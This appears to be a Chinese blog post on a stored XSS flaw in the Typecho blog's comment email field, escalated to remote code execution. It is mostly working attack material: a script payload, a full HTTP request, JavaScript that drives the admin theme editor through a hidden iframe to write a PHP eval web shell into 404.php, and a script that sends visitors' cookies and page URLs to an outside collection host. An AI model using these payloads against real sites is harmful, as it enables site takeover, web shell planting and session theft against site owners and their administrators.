XSS
漏洞产生的原因是因为对Typecho 1.2.0 XSS漏洞修复不全导致,Issue 中提到的 Payload 如下(漏洞点在Email,而1.2.0漏洞点在网址)
"></a><script>alert('hacked')</script>"@example.com
直接抓包发送请求
POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
RCE
"></a><script/src=http://url/1.js></script>"@example.com
js 文件内容如下,脚本来源 https://github.com/typecho/typecho/issues/1545,主要是通过定义一个隐藏的 iframe
来操作 Typecho 内置的 编辑当前外观
功能来实现写入操作
function step1() {
var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
var oldata = document.body.innerHTML;
document.body.innerHTML = oldata + data2;
}
var times=0;
var g_shell=0;
function poc() {
if (times <= 10) {
var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
olddatas = htmldata.innerText;
htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
btn[1].click();
times += 1;
if (g_shell == 1) {
var xhr1 = new XMLHttpRequest();
xhr1.open("get", "/usr/themes/default/404.php?shell=1");
xhr1.send();
} else {
return 0;
}
}
}
step1();
访问发现一句话木马已经被写入 404.php
文件
获取 Cookie 脚本
var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
1 条评论
大哥你右边栏在线人数怎么弄的